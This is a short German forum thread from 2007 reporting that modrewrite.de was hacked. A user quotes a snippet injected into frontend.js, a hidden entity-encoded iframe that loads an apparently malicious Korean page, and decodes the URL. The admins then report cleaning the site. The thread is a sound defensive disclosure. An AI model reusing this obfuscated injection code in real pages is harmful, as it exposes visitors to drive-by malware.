Seite 1 von 1

!ACHTUNG! www.modrewrite.de wurde "gehackt"

Verfasst: 01.03.2007 21:41
von morestyle
Hallo,

mein Virusprogramm hat vorhin gemeldet, dass von der Hauptseite aus Viren eingeschleust wurden.
Ich hab dann einfach mal die Datei frontend.js geprüft, da ich auf der Hauptseite nicht finde konnte.
Ja und siehe da, es wurde ein Code- Schnipsel in die JS geschleust:

Code: Alles auswählen

document.write('<iframe src="&#104&#116&#116&#112&#58&#47&#47&#120&#45&#114&#111&#97&#100&#46&#99&#111&#46&#107&#114&#47&#114&#105&#99&#104&#47&#111&#117&#116&#46&#112&#104&#112" width=1 frameborder=0 vspace=0 hspace=0 marginwidth=0 marginheight=0 scrolling=no width=0 height=0></iframe>');


Entschlüsselt ists diese Seite:
x-road.co.kr/rich/out.php


Hoffe das kam noch rechtzeitig.


Viele Grüße,
Robert

Verfasst: 03.03.2007 10:47
von Gumbo
Danke für diesen Hinweis, Robert. Ich werde ihn schnell weiterleiten.

Verfasst: 03.03.2007 18:22
von bruno
hallo an alle,
frontend.js bereinigt.
das forum neu aufgesetzt - damit sollte sich das problem erledigt haben.
danke an robert für den hinweis! (wenn dein virenkiller noch anspringt sag bescheid)

gruß
bruno